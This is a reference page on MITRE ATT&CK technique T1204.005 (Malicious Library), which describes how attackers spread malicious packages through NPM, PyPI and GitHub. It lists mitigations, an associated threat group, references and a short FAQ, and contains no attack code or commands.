Description
Adversaries may rely on a user installing a malicious library to facilitate execution. Threat actors may Upload Malware to package managers such as NPM and PyPi, as well as to public code repositories such as GitHub. User may install libraries without realizing they are malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that establishes persistence, steals data, or mines cryptocurrency.(Citation: Datadog Security Labs Malicious PyPi Packages 2024)(Citation: Fortinet Malicious NPM Packages 2023)
In some cases, threat actors may compromise and backdoor existing popular libraries (i.e., Compromise Software Dependencies and Development Tools). Alternatively, they may create entirely new packages and leverage behaviors such as typosquatting to encourage users to install them.
Platforms
Mitigations (3)
Limit Software InstallationM1033
Where possible, consider requiring developers to pull from internal repositories containing verified and approved packages rather than from external ones.
Network Intrusion PreventionM1031
Network prevention intrusion systems and systems designed to scan and remove malicious downloads can be used to block activity.
User TrainingM1017
Train developers to be aware of the existence of malicious libraries and how to avoid installing them.
Threat Groups (1)
| ID | Group | Context |
|---|---|---|
| G1052 | Contagious Interview | [Contagious Interview](https://attack.mitre.org/groups/G1052) has relied on users to install a malicious library from a code repository to infect the ... |
References
- Sebastian Obregoso and Christophe Tafani-Dereeper. (2024, May 23). Malicious PyPI packages targeting highly specific MacOS machines. Retrieved May 22, 2025.
- Jin Lee and Jenna Wang. (2023, October 2). Malicious Packages Hidden in NPM. Retrieved May 22, 2025.
Frequently Asked Questions
What is T1204.005 (Malicious Library)?
T1204.005 is a MITRE ATT&CK technique named 'Malicious Library'. It belongs to the Execution tactic(s). Adversaries may rely on a user installing a malicious library to facilitate execution. Threat actors may [Upload Malware](https://attack.mitre.org/techniques/T1608/001) to package managers such as NPM...
How can T1204.005 be detected?
Detection of T1204.005 (Malicious Library) typically involves monitoring system logs, network traffic, and endpoint telemetry. Use SIEM rules, EDR solutions, and behavioral analytics to identify suspicious activity associated with this technique.
What mitigations exist for T1204.005?
There are 3 documented mitigations for T1204.005. Key mitigations include: Limit Software Installation, Network Intrusion Prevention, User Training.
Which threat groups use T1204.005?
Known threat groups using T1204.005 include: Contagious Interview.